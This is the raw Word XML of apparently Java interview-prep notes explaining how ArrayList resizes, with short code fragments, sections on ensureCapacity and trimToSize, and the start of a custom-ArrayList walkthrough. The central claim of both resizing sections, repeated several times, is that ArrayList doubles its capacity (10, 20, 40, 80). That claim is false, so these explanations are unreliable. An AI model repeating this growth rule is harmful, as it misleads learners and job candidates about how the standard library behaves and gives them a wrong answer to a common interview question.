    <w:p w14:paraId="64F00297"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operations like frequent insertions and deletions from the beginning or middle of the list, consider using other collections lik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34259236" w14:textId="7A75FEB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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0F793"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8" w:name="_Toc197867372"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ArrayList increase its size dynamically?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="0BBB38B9" w14:textId="18791FF0" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00483F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explanation of how this resizing works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304652F6"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14E978E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starts with an initial capacity. By default, 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meaning that the internal array can hold up to 10 elements before it needs to resize. If you add more than 10 elements, the ArrayList will automatically resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF8E48"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449236A0"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internal array is initially of size 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38466321"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 to the ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55BC01"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using methods like </w:t>
      </w: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the ArrayList first checks if there’s enough capacity in the internal array to hold the new element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A7C75"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 has space (i.e., the current size is less than the capacity), the element is simply added at the next available index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25655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Capacity is Reached (Resizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE0729"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List reaches its capacity (i.e., the number of elements in the list exceeds the capacity), the internal array needs to be resized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55853D"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nvolves creating a new, larger array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copying all the existing elements from the old array to the new one. This ensures that the ArrayList can accommodate additional elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E54ABA"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Resizing Behavior (Doubling the Capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1470AC0C" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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hen the ArrayList runs out of space, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles its capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185001B" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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internal array has a capacity of 10 and you add the 11th element, the ArrayList will create a new internal array of size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and copy all elements from the old array to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661EB0B"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 of Dynamic Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582D9AB"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walk through an example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5325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EC8F672" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA327C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ResizeExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A48F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B0D609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B3EE07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6E34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dding 10 elements (array capacity is 10 by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B988F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12C81685"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211494E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A2332C" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4291E81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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72828529" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143B73E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47DB12A7"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3A677C6A" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1CCFF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6402CF"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CCC09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05A218"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 but after adding 10 elements, the capacity will increase to 20 when the 11th element is added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F285DDD"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array grows by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubling the previous capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when resizing is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA5DDC0"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Time Complexity of Resizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838C8E5"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s an expensive operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it involves creating a new array and copying the elements from the old array to the new one. The time complexity for resizing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in the array at the time of resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757FD13B"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does not happen every time you add an element. It only happens when the capacity is exceeded, so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still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438AAEAF"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Custom Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C38EE" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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an initial capacity when creating the ArrayList to avoid resizing during the initial insertions if you know you'll have a large number of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00D5A1"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  // initial capacity of 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E107327" w14:textId="77777777" w:rsidR="0053223D" w:rsidRPr="00CE4B95" w:rsidRDefault="0053223D" w:rsidP="00197BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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avoid the overhead of resizing when the array is full and also helps in reducing the number of reallocations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E8E23"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 (Manually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073FAEEF"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though ArrayList automatically grows when more elements are added, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not automatically shrink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when elements are removed. This can result in wasted memory if many elements are removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3126AE9D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shrink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the capacity of the ArrayList to match the current size, you can call the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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340581D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trimToSize();  // Adjusts the internal array size to match the current size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252256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by eliminating unused space in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471277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Resizing Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740424FF"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10 (default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C34E2"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Mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When the ArrayList reaches capacity, it creates a new array that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>twice the size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the previous one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555B1D3"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The resizing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ut this happens infrequently, so adding elements typically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13939876"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Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can set the initial capacity to avoid frequent resizing for large collections of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204CB22C"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dynamic resizing behavior ensures that ArrayList can efficiently manage its size as elements are added, without requiring the user to manually resize the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779965A2" w14:textId="1EB304FB"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31E22C"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9" w:name="_Toc197867373"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does ArrayList grow?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="57B3C782" w14:textId="67DF55B3" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0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grows dynamically by doubling its size whenever it reaches its capacity limit. Here's a detailed explanation of how this growth process works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9BC78"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Grows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C003D6"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42600414"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has an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which is 10 by default if not specified).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78895D36"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internal array of the ArrayList can hold without needing to resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C9DAAD"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Default capacity is 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6F4A5" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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pecify the initial capacity, the array will be created with that size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74109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lt;Integer&gt; list = new ArrayList&lt;&gt;(50); // Initial capacity of 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD68F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0C315"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added to the ArrayList using methods like add(), it checks if there is enough capacity in the internal array to hold the new element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B68D4D1"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nal array has space, the element is simply added to the next available index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB94E1B"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ArrayList Runs Out of Space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F66F81"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List has reached its maximum capacity (i.e., the number of elements exceeds the internal array's capacity), the ArrayLis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4320478F"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larger array is created, and the elements from the old array are copied into the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48660C6C"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the internal array had a capacity of 10 and you try to add an 11th element, the ArrayList will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7630E"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 a new array with a capacity of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double the previous capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669FBF10"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 all the existing elements to the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971C4BF"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the new element to the newly resized array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95977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rowth Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1C13F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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ArrayLis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each time the array becomes full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF6D1F" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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36CA12EE"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capacity: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145180B"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10 elements, capacity grows to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B820D5"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20 elements, capacity grows to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0661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40 elements, capacity grows to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA70E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so on...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB20D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ime Complexity of Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226E145"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the array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when it grows) is an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operation, where n is the number of elements in the array at the time of resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189CEAE9" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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cause all elements from the old array have to be copied to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ECB420"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happens infrequently because the ArrayList doubles in size each time. As a result,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i.e., adding elements is efficient).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C7146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D66990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4093A58" w14:textId="77777777" w:rsidR="001A029F" w:rsidRPr="00CE4B95" w:rsidRDefault="001A029F" w:rsidP="008F0B0A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31102088"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GrowthExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BCBDB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C7448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09C3B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A04BF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10 elements to the ArrayList (initial capacity is 10 by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E2EB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3DA4393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6032E48A"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7676E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  // Output: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB22B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2F172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7197084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4A24997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1FCA1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  // Output: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53988AC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0FE32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8A5596"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70025672"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB5664"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add the 11th element, the ArrayList will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (double its capacity) to hold more elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE0149"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uble the Size?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B427E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ubling the size is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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03E74559"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of an ArrayList is 10 if not specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C11D1"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19245865"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 xml:space="preserve"> involves creating a new array and copying all existing elements to the new array, which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each resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FC986"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resizing happens infrequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2E14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nual Capacity Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A86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know that your ArrayList will contain a large number of elements, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set an initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid frequent resizing operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00136DD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100); // Initial capacity of 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AC3E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can help </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimize performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you expect to add a large number of elements, avoiding multiple resizing operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E44640" w14:textId="5D0D0486"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E25CD"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0" w:name="_Toc197867374"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain internal working of ensureCapacity method?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="780CF8E5" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95"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nsureCapacityIntern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BF2B7F5"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09881FDA"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lement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FAULTCAPACITY_EMPTY_ELEMEN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AAC9C"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minCapacit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FAULT_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3FCC24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2B5DCF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t>ensureExplicit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Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EA8190"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07953FF"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1" w:name="_Toc197867375"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you write a custom ArrayList which will take the input capacity?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="21E69F29" w14:textId="3AC4B03B" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">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o write a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java that takes an input capacity, you can create a new class that mimics the behavior of the ArrayList but allows users to specify the initial capacity during initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27749F91"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A55F1"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Create a custom class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an internal array to store the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FD757"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Allow the user to set the initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D507CF"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Handle resizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the internal array exceeds its capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37997CEC"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Implement common ArrayList functionalities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
